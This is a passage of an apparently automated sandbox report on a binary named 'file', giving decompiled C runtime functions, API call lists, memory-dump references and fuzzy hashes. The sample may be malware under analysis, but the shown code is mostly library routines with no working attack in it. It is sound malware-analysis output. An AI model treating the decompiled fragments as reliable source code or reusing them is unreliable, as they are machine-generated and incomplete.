                0x00404f85
                0x00404f8a
                0x00404f8b
                0x00404f91
                0x00404f96
                0x00404f97
                0x00404fa2
                0x00404faf
                0x00404fbb
                0x00404fc3
                0x00404fd0
                0x00404fd8
                0x00404fd9
                0x00404fde
                0x00404fe6
                0x00404feb
                0x00404fec
                0x00404ff3
                0x00404ff9
                0x00405004
                0x00405004
                0x00405009
                0x0040500e
                0x0040500e
                0x00405013
                0x0040501b
                0x00405022
                0x00405022
                0x00405028
                0x00405028
                0x0040502b
                0x00405030
                0x0040503a
                0x00405045
                0x0040504e
                0x0040504e
                0x00405054
                0x00405054
                0x00405057
                0x0040505c
                0x00405061
                0x0040506b

                APIs
                • _printf.LIBCMT ref: 00404F8B
                  • Part of subcall function 00406FC9: DeleteFileA.KERNEL32(?,?,00404F96,00000000,00000000, %s %d %f), ref: 00406FD1
                  • Part of subcall function 00406FC9: GetLastError.KERNEL32(?,00404F96,00000000,00000000, %s %d %f), ref: 00406FDB
                  • Part of subcall function 00406FC9: __dosmaperr.LIBCMT ref: 00406FEA
                  • Part of subcall function 00405DA5: __EH_prolog.LIBCMT ref: 00405DAA
                  • Part of subcall function 00406375: __EH_prolog.LIBCMT ref: 004062F5
                  • Part of subcall function 00406F3B: __lock.LIBCMT ref: 00406F59
                  • Part of subcall function 00406F3B: ___sbh_find_block.LIBCMT ref: 00406F64
                  • Part of subcall function 00406F3B: ___sbh_free_block.LIBCMT ref: 00406F73
                  • Part of subcall function 00406F3B: HeapFree.KERNEL32(00000000,00000001,00418210,0000000C,0040AEC3,00000000,004184C8,0000000C,0040AEFD,00000001,004094B5,?,0040AC99,00000004,004184A8,0000000C), ref: 00406FA3
                  • Part of subcall function 00406F3B: GetLastError.KERNEL32(?,0040AC99,00000004,004184A8,0000000C,004101D5,00000001,004094C4,00000000,00000000,00000000,?,004094C4,00000001,00000214), ref: 00406FB4
                • _calloc.LIBCMT ref: 00404FF3
                  • Part of subcall function 00406EFB: __calloc_impl.LIBCMT ref: 00406F10
                  • Part of subcall function 00406EE5: __wcstoi64.LIBCMT ref: 00406EF1
                • SetCriticalSectionSpinCount.KERNEL32(?,00000000), ref: 00405022
                • GetTextFaceW.GDI32(00000000,00000000,?), ref: 00405045
                • EnumTimeFormatsA.KERNEL32(00000000,00000000,00000000), ref: 0040504E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                Similarity
                • API ID: ErrorH_prologLast$CountCriticalDeleteEnumFaceFileFormatsFreeHeapSectionSpinTextTime___sbh_find_block___sbh_free_block__calloc_impl__dosmaperr__lock__wcstoi64_calloc_printf
                • String ID: %s %d %f$mufuvopuvaselaxeka
                • API String ID: 865613364-3334930690
                • Opcode ID: 1f2e097d296a41b9d5b9a463197e56abe0b745019d18dcf072c431a4a3449ee2
                • Instruction ID: b5b9f6c67a5bafa29bc93e95b67dd32297b15221bad1a6ab35babe56cc14f9c1
                • Opcode Fuzzy Hash: 1f2e097d296a41b9d5b9a463197e56abe0b745019d18dcf072c431a4a3449ee2
                • Instruction Fuzzy Hash: A3218131802A196ACB11FB61ED56DEF7768EF21318B50443BF402721E1EB3C5A4ACADD
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E00409CBD(intOrPtr __ecx) {
                				void* _t47;
                				intOrPtr _t48;
                				void* _t53;
                				void* _t54;
                				void* _t56;
                				intOrPtr _t57;
                				void* _t58;
                				void* _t61;
                
                				_push(0x2c);
                				_push(0x4183c8);
                				E0040B9DC(_t47, _t54, _t56);
                				_t48 = __ecx;
                				_t55 =  *((intOrPtr*)(_t58 + 0xc));
                				_t57 =  *((intOrPtr*)(_t58 + 8));
                				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
                				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
                				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
                				 *((intOrPtr*)(_t58 - 0x28)) = E00406DAA(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
                				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E00409512(__ecx, _t53, _t61) + 0x88));
                				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E00409512(_t48, _t53, _t61) + 0x8c));
                				 *((intOrPtr*)(E00409512(_t48, _t53, _t61) + 0x88)) = _t57;
                				 *((intOrPtr*)(E00409512(_t48, _t53, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
                				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                				 *((intOrPtr*)(_t58 + 0x10)) = 1;
                				 *(_t58 - 4) = 1;
                				 *((intOrPtr*)(_t58 - 0x1c)) = E00406E4F(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
                				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                				 *(_t58 - 4) = 0xfffffffe;
                				 *((intOrPtr*)(_t58 + 0x10)) = 0;
                				E00409DE3(_t48, _t53, _t55, _t57, _t61);
                				return E0040BA21( *((intOrPtr*)(_t58 - 0x1c)));
                			}











                0x00409cbd
                0x00409cbf
                0x00409cc4
                0x00409cc9
                0x00409ccb
                0x00409cce
                0x00409cd1
                0x00409cd4
                0x00409cdb
                0x00409cec
                0x00409cfa
                0x00409d08
                0x00409d10
                0x00409d1e
                0x00409d24
                0x00409d2b
                0x00409d2e
                0x00409d44
                0x00409d47
                0x00409dbc
                0x00409dc3
                0x00409dca
                0x00409dd7

                APIs
                • __CreateFrameInfo.LIBCMT ref: 00409CE5
                  • Part of subcall function 00406DAA: __getptd.LIBCMT ref: 00406DB8
                  • Part of subcall function 00406DAA: __getptd.LIBCMT ref: 00406DC6
                • __getptd.LIBCMT ref: 00409CEF
                  • Part of subcall function 00409512: __getptd_noexit.LIBCMT ref: 00409515
                  • Part of subcall function 00409512: __amsg_exit.LIBCMT ref: 00409522
                • __getptd.LIBCMT ref: 00409CFD
                • __getptd.LIBCMT ref: 00409D0B
                • __getptd.LIBCMT ref: 00409D16
                • _CallCatchBlock2.LIBCMT ref: 00409D3C
                  • Part of subcall function 00406E4F: __CallSettingFrame@12.LIBCMT ref: 00406E9B
                  • Part of subcall function 00409DE3: __getptd.LIBCMT ref: 00409DF2
                  • Part of subcall function 00409DE3: __getptd.LIBCMT ref: 00409E00
                Memory Dump Source
                • Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                Similarity
                • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                • String ID:
                • API String ID: 1602911419-0
                • Opcode ID: a6dfd3c0764eaa1add6de5649679d150073a72374b75e37d8ed49aff770b144c
                • Instruction ID: 455280d715f165e9d1458bc07a0e1b8026eeea6b72753631961bb2dec7ada048
                • Opcode Fuzzy Hash: a6dfd3c0764eaa1add6de5649679d150073a72374b75e37d8ed49aff770b144c
                • Instruction Fuzzy Hash: BA11C6B1D00209EFDF01EFA5C845AED7BB0FF44318F10806AF865A7292DB389A119F58
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 83%
                			E00406A18(intOrPtr _a4) {
                				signed int _v16;
                				char _v20;
                				char _v24;
                				signed int _v32;
                				void* _v36;
                				long _v40;
                				void _v60;
                				void* __edi;
                				void* _t20;
                				signed int _t21;
                				signed int _t26;
                				DWORD* _t27;
                				void* _t30;
                				signed int _t34;
                				void* _t38;
                
                				while(1) {
                					_t20 = E0040743A(_t30, _t38, _a4);
                					if(_t20 != 0) {
                						break;
                					}
                					_t21 = E00409935(_a4);
                					__eflags = _t21;
                					if(_t21 == 0) {
                						__eflags =  *0x557584 & 0x00000001;
                						if(( *0x557584 & 0x00000001) == 0) {
                							 *0x557584 =  *0x557584 | 0x00000001;
                							__eflags =  *0x557584;
                							E004069FD(0x557578);
                							E0040990F( *0x557584, 0x415e22);
                						}
                						E0040526E( &_v16, 0x557578);
                						_push("h@~A");
                						_push( &_v16);
                						L7();
                						asm("int3");
                						_push(0x557578);
                						_push(_t38);
                						_t34 = 8;
                						_v36 = memcpy( &_v60, 0x401500, _t34 << 2);
                						_t26 = _v16;
                						_v32 = _t26;
                						__eflags = _t26;
                						if(_t26 != 0) {
                							__eflags =  *_t26 & 0x00000008;
                							if(( *_t26 & 0x00000008) != 0) {
                								_v20 = 0x1994000;
                							}
                						}
                						_t27 =  &_v20;
                						_t17 =  &_v24; // 0x406a7c
                						RaiseException(_v40, _v36,  *_t17, _t27);
                						return _t27;
                					} else {
                						continue;
                					}
                					L11:
                				}
                				return _t20;
                				goto L11;
                			}


















                0x00406a2f
                0x00406a32
                0x00406a3a
                0x00000000
                0x00000000
                0x00406a25
                0x00406a2b
                0x00406a2d
                0x00406a3e
                0x00406a4a
                0x00406a4c
                0x00406a4c
                0x00406a55
                0x00406a5f
                0x00406a64
                0x00406a69
                0x00406a6e
                0x00406a76
                0x00406a77
                0x00406a7c
                0x00406a88
                0x00406a89
                0x00406a8c
                0x00406a97
                0x00406a9a
                0x00406a9e
                0x00406aa2
                0x00406aa4
                0x00406aa6
                0x00406aa9
                0x00406aab
                0x00406aab
                0x00406aa9
                0x00406ab2
                0x00406ab6
                0x00406abf
                0x00406ac6
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406a2d
                0x00406a3d
                0x00000000

                APIs
                • _malloc.LIBCMT ref: 00406A32
                  • Part of subcall function 0040743A: __FF_MSGBANNER.LIBCMT ref: 0040745D
                  • Part of subcall function 0040743A: __NMSG_WRITE.LIBCMT ref: 00407464
                  • Part of subcall function 0040743A: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,0041018B,00000001,00000001,00000001,?,0040AE6C,00000018,004184C8,0000000C,0040AEFD), ref: 004074B1
                • std::bad_alloc::bad_alloc.LIBCMT ref: 00406A55
                  • Part of subcall function 004069FD: std::exception::exception.LIBCMT ref: 00406A09
                • __CxxThrowException@8.LIBCMT ref: 00406A77
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                Similarity
                • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::exception::exception
                • String ID: h@~A$xuU
                • API String ID: 3715980512-1248273695
                • Opcode ID: e31c1c94900ae92f0dcf41c21c44f44344b79336965c23dba0a5cc2fd3e064ee
                • Instruction ID: 601e2f14aee376df9ee42435a685d68e851ded8c7669ac22412a36118604ece9
                • Opcode Fuzzy Hash: e31c1c94900ae92f0dcf41c21c44f44344b79336965c23dba0a5cc2fd3e064ee
                • Instruction Fuzzy Hash: B7F0E231A0420D67CB047B21EC1298A3B689F46318B2280BFFC06B51D2EF3C9E659949
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 74%
                			E00409A0C(void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
                				signed int _v8;
                				intOrPtr _t11;
                				intOrPtr* _t15;
                				intOrPtr* _t19;
                				void* _t23;
                
                				_t25 = __edi;
                				_t24 = __edx;
                				_t11 =  *((intOrPtr*)( *_a4));
                				if(_t11 == 0xe0434f4d) {
                					__eflags =  *((intOrPtr*)(E00409512(_t23, __edx, __eflags) + 0x90));
                					if(__eflags > 0) {
                						_t15 = E00409512(_t23, __edx, __eflags) + 0x90;
                						 *_t15 =  *_t15 - 1;
                						__eflags =  *_t15;
                					}
                					goto L5;
                				} else {
                					_t32 = _t11 - 0xe06d7363;
                					if(_t11 != 0xe06d7363) {
                						L5:
                						__eflags = 0;
                						return 0;
                					} else {
                						 *(E00409512(_t23, __edx, _t32) + 0x90) =  *(_t16 + 0x90) & 0x00000000;
                						_push(8);
                						_push(0x418468);
                						E0040B9DC(_t23, __edi, __esi);
                						_t19 =  *((intOrPtr*)(E00409512(_t23, __edx, _t32) + 0x78));
                						if(_t19 != 0) {
                							_v8 = _v8 & 0x00000000;
                							 *_t19();
                							_v8 = 0xfffffffe;
                						}
                						return E0040BA21(E0041030E(_t23, _t24, _t25));
                					}
                				}
                			}








                0x00409a0c
                0x00409a0c
                0x00409a16
                0x00409a1d
                0x00409a3c
                0x00409a43
                0x00409a4a
                0x00409a4f
                0x00409a4f
                0x00409a4f
                0x00000000
                0x00409a1f
                0x00409a1f
                0x00409a24
                0x00409a51
                0x00409a51
                0x00409a54
                0x00409a26
                0x00409a2b
                0x0040a616
                0x0040a618
                0x0040a61d
                0x0040a627
                0x0040a62c
                0x0040a62e
                0x0040a632
                0x0040a63d
                0x0040a63d
                0x0040a64e
                0x0040a64e
                0x00409a24

                APIs
                • __getptd.LIBCMT ref: 00409A26
                  • Part of subcall function 00409512: __getptd_noexit.LIBCMT ref: 00409515
                  • Part of subcall function 00409512: __amsg_exit.LIBCMT ref: 00409522
                • __getptd.LIBCMT ref: 00409A37
                • __getptd.LIBCMT ref: 00409A45
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                Similarity
                • API ID: __getptd$__amsg_exit__getptd_noexit
                • String ID: MOC$csm
                • API String ID: 803148776-1389381023
                • Opcode ID: 79edc0a518ba9469f2ba53198a8b45b6bd2c90eac2c121f6cec3718a3dc5b6f0
                • Instruction ID: 6254f9dd037a097689e981c217c7ad32807bda0d8fa321fad349858e9e17920d
                • Opcode Fuzzy Hash: 79edc0a518ba9469f2ba53198a8b45b6bd2c90eac2c121f6cec3718a3dc5b6f0
                • Instruction Fuzzy Hash: F3E04F362142049FCB50BB66C446B2937A4EB95318F1A40B7E40DD73A3C73CDC50AA9A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E0040DF13(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                				signed int _t15;
                				LONG* _t21;
                				long _t23;
                				void* _t31;
                				LONG* _t33;
                				void* _t34;
                				void* _t35;
                
                				_t35 = __eflags;
                				_t29 = __edx;
                				_t25 = __ebx;
                				_push(0xc);
                				_push(0x418528);
                				E0040B9DC(__ebx, __edi, __esi);
                				_t31 = E00409512(__ebx, __edx, _t35);
                				_t15 =  *0x42cbb4; // 0xfffffffe
                				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                					E0040AEE2(_t25, _t31, 0xd);
                					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                					_t33 =  *(_t31 + 0x68);
                					 *(_t34 - 0x1c) = _t33;
                					__eflags = _t33 -  *0x42cab8; // 0x21c2c30
                					if(__eflags != 0) {
                						__eflags = _t33;
                						if(_t33 != 0) {
                							_t23 = InterlockedDecrement(_t33);
                							__eflags = _t23;
                							if(_t23 == 0) {
                								__eflags = _t33 - 0x42c690;
                								if(__eflags != 0) {
                									_push(_t33);
                									E00406F3B(_t25, _t31, _t33, __eflags);
                								}
                							}
                						}
                						_t21 =  *0x42cab8; // 0x21c2c30
                						 *(_t31 + 0x68) = _t21;
                						_t33 =  *0x42cab8; // 0x21c2c30
                						 *(_t34 - 0x1c) = _t33;
                						InterlockedIncrement(_t33);
                					}
                					 *(_t34 - 4) = 0xfffffffe;
                					E0040DFAE();
                				} else {
                					_t33 =  *(_t31 + 0x68);
                				}
                				if(_t33 == 0) {
                					E0040CB0F(_t29, 0x20);
                				}
                				return E0040BA21(_t33);
                			}










                0x0040df13
                0x0040df13
                0x0040df13
                0x0040df13
                0x0040df15
                0x0040df1a
                0x0040df24
                0x0040df26
                0x0040df2e
                0x0040df4f
                0x0040df55
                0x0040df59
                0x0040df5c
                0x0040df5f
                0x0040df65
                0x0040df67
                0x0040df69
                0x0040df6c
                0x0040df72
                0x0040df74
                0x0040df76
                0x0040df7c
                0x0040df7e
                0x0040df7f
                0x0040df84
                0x0040df7c
                0x0040df74
                0x0040df85
                0x0040df8a
                0x0040df8d
                0x0040df93
                0x0040df97
                0x0040df97
                0x0040df9d
                0x0040dfa4
                0x0040df36
                0x0040df36
                0x0040df36
                0x0040df3b
                0x0040df3f
                0x0040df44
                0x0040df4c

                APIs
                • __getptd.LIBCMT ref: 0040DF1F
                  • Part of subcall function 00409512: __getptd_noexit.LIBCMT ref: 00409515
                  • Part of subcall function 00409512: __amsg_exit.LIBCMT ref: 00409522
                • __amsg_exit.LIBCMT ref: 0040DF3F
                • __lock.LIBCMT ref: 0040DF4F
                • InterlockedDecrement.KERNEL32(?), ref: 0040DF6C
                • InterlockedIncrement.KERNEL32(021C2C30), ref: 0040DF97
                Memory Dump Source
                • Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                Similarity
                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                • String ID:
                • API String ID: 4271482742-0
                • Opcode ID: 1867fb20bf003527f7d320963a5a4876af3ba585a3dd6aef947d41df459310b5
                • Instruction ID: 9214df55b5cdb973349ba12c6a4523de1b58fc2de2eaee48678da7b0d1a15525
                • Opcode Fuzzy Hash: 1867fb20bf003527f7d320963a5a4876af3ba585a3dd6aef947d41df459310b5
                • Instruction Fuzzy Hash: F4016131E01612ABC721EB9A984575E7760AF44714F14817BF811777D0C73C6985CBDD
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 39%
                			E00406F3B(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                				intOrPtr* _t10;
                				intOrPtr _t13;
                				intOrPtr _t23;
                				void* _t25;
                
                				_push(0xc);
                				_push(0x418210);
                				_t8 = E0040B9DC(__ebx, __edi, __esi);
                				_t23 =  *((intOrPtr*)(_t25 + 8));
                				if(_t23 == 0) {
                					L9:
                					return E0040BA21(_t8);
                				}
                				if( *0x55927c != 3) {
                					_push(_t23);
                					L7:
                					if(HeapFree( *0x5575bc, 0, ??) == 0) {
                						_t10 = E00407A37();
                						 *_t10 = E004079F5(GetLastError());
                					}
                					goto L9;
                				}
                				E0040AEE2(__ebx, __edi, 4);
                				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                				_t13 = E0040AF15(_t23);
                				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                				if(_t13 != 0) {
                					_push(_t23);
                					_push(_t13);
                					E0040AF45();
                				}
                				 *(_t25 - 4) = 0xfffffffe;
                				_t8 = E00406F91();
                				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                					goto L9;
                				} else {
                					_push( *((intOrPtr*)(_t25 + 8)));
                					goto L7;
                				}
                			}







                0x00406f3b
                0x00406f3d
                0x00406f42
                0x00406f47
                0x00406f4c
                0x00406fc3
                0x00406fc8
                0x00406fc8
                0x00406f55
                0x00406f9a
                0x00406f9b
                0x00406fab
                0x00406fad
                0x00406fc0
                0x00406fc2
                0x00000000
                0x00406fab
                0x00406f59
                0x00406f5f
                0x00406f64
                0x00406f6a
                0x00406f6f
                0x00406f71
                0x00406f72
                0x00406f73
                0x00406f79
                0x00406f7a
                0x00406f81
                0x00406f8a
                0x00000000
                0x00406f8c
                0x00406f8c
                0x00000000
                0x00406f8c

                APIs
                • __lock.LIBCMT ref: 00406F59
                  • Part of subcall function 0040AEE2: __mtinitlocknum.LIBCMT ref: 0040AEF8
                  • Part of subcall function 0040AEE2: __amsg_exit.LIBCMT ref: 0040AF04
                  • Part of subcall function 0040AEE2: EnterCriticalSection.KERNEL32(004094B5,004094B5,?,0040AC99,00000004,004184A8,0000000C,004101D5,00000001,004094C4,00000000,00000000,00000000,?,004094C4,00000001), ref: 0040AF0C
                • ___sbh_find_block.LIBCMT ref: 00406F64
                • ___sbh_free_block.LIBCMT ref: 00406F73
                • HeapFree.KERNEL32(00000000,00000001,00418210,0000000C,0040AEC3,00000000,004184C8,0000000C,0040AEFD,00000001,004094B5,?,0040AC99,00000004,004184A8,0000000C), ref: 00406FA3
                • GetLastError.KERNEL32(?,0040AC99,00000004,004184A8,0000000C,004101D5,00000001,004094C4,00000000,00000000,00000000,?,004094C4,00000001,00000214), ref: 00406FB4
                Memory Dump Source
                • Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                Similarity
                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                • String ID:
                • API String ID: 2714421763-0
                • Opcode ID: 82d1217dc7766422609e9fd4519e9b167b1883a48651fa9a0e2391cd9c925708
                • Instruction ID: 834a6a4038c298237d3a83dbb6ad1ad90ecc2e8dee653c272b1303f6ac42c9c6
                • Opcode Fuzzy Hash: 82d1217dc7766422609e9fd4519e9b167b1883a48651fa9a0e2391cd9c925708
                • Instruction Fuzzy Hash: 63018471904303AEDF20AF72BC06B5E3A64AF01369F21403FF005761D1CA3C99519A9D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 20%
                			E0040A06A(void* __ebx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                				void* __ebp;
                				void* _t20;
                				void* _t22;
                				void* _t23;
                				void* _t25;
                				intOrPtr* _t26;
                				void* _t27;
                				void* _t28;
                
                				_t27 = __esi;
                				_t26 = __edi;
                				_t22 = __ebx;
                				_t30 = _a20;
                				if(_a20 != 0) {
                					_push(_a20);
                					_push(__ebx);
                					_push(__esi);
                					_push(_a4);
                					E00409FD8(__ebx, __edi, __esi, _t30);
                					_t28 = _t28 + 0x10;
                				}
                				_t31 = _a28;
                				_push(_a4);
                				if(_a28 != 0) {
                					_push(_a28);
                				} else {
                					_push(_t27);
                				}
                				E00406B02(_t23);
                				_push( *_t26);
                				_push(_a16);
                				_push(_a12);
                				_push(_t27);
                				E00409A55(_t22, _t25, _t26, _t27, _t31);
                				_push(0x100);
                				_push(_a24);
                				_push(_a16);
                				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
                				_push(_a8);
                				_push(_t27);
                				_push(_a4);
                				_t20 = E00409CBD( *((intOrPtr*)(_t22 + 0xc)));
                				if(_t20 != 0) {
                					E00406AC9(_t20, _t27);
                					return _t20;
                				}
                				return _t20;
                			}











                0x0040a06a
                0x0040a06a
                0x0040a06a
                0x0040a06f
                0x0040a073
                0x0040a075
                0x0040a078
                0x0040a079
                0x0040a07a
                0x0040a07d
                0x0040a082
                0x0040a082
                0x0040a085
                0x0040a089
                0x0040a08c
                0x0040a091
                0x0040a08e
                0x0040a08e
                0x0040a08e
                0x0040a094
                0x0040a099
                0x0040a09b
                0x0040a09e
                0x0040a0a1
                0x0040a0a2
                0x0040a0aa
                0x0040a0af
                0x0040a0b3
                0x0040a0b6
                0x0040a0b9
                0x0040a0bf
                0x0040a0c0
                0x0040a0c3
                0x0040a0cd
                0x0040a0d1
                0x00000000
                0x0040a0d1
                0x0040a0d7

                APIs
                • ___BuildCatchObject.LIBCMT ref: 0040A07D
                  • Part of subcall function 00409FD8: ___BuildCatchObjectHelper.LIBCMT ref: 0040A00E
                • _UnwindNestedFrames.LIBCMT ref: 0040A094
                • ___FrameUnwindToState.LIBCMT ref: 0040A0A2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.270420036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.270412745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270420036.0000000000417000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270453956.000000000041A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270466330.0000000000557000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.270530367.000000000055A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                Similarity
                • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                • String ID: csm
                • API String ID: 2163707966-1018135373
                • Opcode ID: f96ea05d7d615432173e952efb9fbac2433b356751b877c4f48df9a42dbdf93c
                • Instruction ID: 04ab747438a75b17733196539c474dde0f8660501443c1b1e6f5a2f05f0c1712
                • Opcode Fuzzy Hash: f96ea05d7d615432173e952efb9fbac2433b356751b877c4f48df9a42dbdf93c
                • Instruction Fuzzy Hash: 39014B71400209BBDF22AF51CC45EEB3F6AEF04354F048026FD1C241A1D73A99B1DBA9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E004089D1() {
                				signed long long _v12;
                				signed int _v20;
                				signed long long _v28;
                				signed char _t8;
                
                				_t8 = GetModuleHandleA("KERNEL32");
                				if(_t8 == 0) {
                					L6:
                					_v20 =  *0x401538;
                					_v28 =  *0x401530;
                					asm("fsubr qword [ebp-0x18]");
                					_v12 = _v28 / _v20 * _v20;
                					asm("fld1");
                					asm("fcomp qword [ebp-0x8]");
                					asm("fnstsw ax");
                					if((_t8 & 0x00000005) != 0) {
                						return 0;
                					} else {
                						return 1;
                					}
                				} else {
